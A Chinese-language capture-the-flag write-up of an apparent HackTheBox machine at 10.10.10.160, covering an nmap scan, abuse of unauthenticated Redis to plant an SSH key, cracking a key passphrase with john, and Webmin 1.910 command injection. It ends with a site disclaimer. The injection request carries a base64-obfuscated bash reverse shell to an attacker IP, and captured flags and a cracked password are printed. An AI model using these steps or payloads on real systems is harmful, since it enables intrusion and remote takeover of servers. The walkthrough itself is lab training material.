信息收集

$ nmap -p- 10.10.10.160 --min-rate 1000 -sC -sV

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

redis未授权访问 & SSH公钥注入

$ redis-cli -h 10.10.10.160

10.10.10.160:6379> CONFIG GET *

10.10.10.160:6379> CONFIG GET dir

10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh

证明目录存在

$ cat ~/.ssh/id_ed25519.pub

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOAuKxlopDqsLWIAFeZFEOiSBz9K/go+OybYs5gwGEBE maptnh@maptnh

$ (echo -e "\n\n";cat ~/.ssh/id_ed25519.pub;echo -e "\n\n")>key.txt;cat key.txt | redis-cli -h 10.10.10.160 -x set id_rsa_key

$ redis-cli -h 10.10.10.160

10.10.10.160:6379> GET id_rsa_key

10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh

10.10.10.160:6379> CONFIG SET dbfilename authorized_keys

10.10.10.160:6379> save

10.10.10.160:6379> exit

使用 CONFIG SET 指令来设置 dir 和 dbfilename 配置项，通常是用于设置 Redis 数据库的持久化文件路径和文件名。这将导致 Redis 将数据以 authorized_keys 文件的形式保存到指定目录中。

$ ssh -i ~/.ssh/id_ed25519 [email protected]

RSA私钥解密

$ cat /opt/id_rsa.bak

$ ssh2john id_rsa >./id_rsa.john

$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john

password:computer2008

$ su Matt

User.txt

9d90e967236578fdf6be43ea87c03a53

权限提升

$ whatweb https://10.10.10.160:10000 -v

$ searchsploit Webmin

https://github.com/KentVolt/Webmin-1.910-Exploit/blob/master/Webmin%201.910%20-%20Remote%20Code%20Execution%20using%20BurpSuite

https://10.10.10.160:10000/

username:Matt password:computer2008

https://10.10.10.160:10000/package-updates/?xnavigation=1

$ sudo tcpdump -i any icmp

POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.160:10000
Cookie: redirect=1; testing=1; sid=43462a3948984572e11138d45052c3d8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Progressive-Url: https://10.10.10.160:10000/package-updates/update.cgi
X-Requested-From: package-updates
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Length: 19
Origin: https://10.10.10.160:10000
Referer: https://10.10.10.160:10000/package-updates/update.cgi?xnavigation=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

u=acl%2Fapt&u=$(ping%20-c%201%2010.10.16.14)

u=acl%2Fapt&u=$(echo${IFS}"L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTQvMTAwMzUgMD4mMScK"|base64${IFS}-d|bash)

Root.txt

ded02459b6863f771d4371e25ee2c11c

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）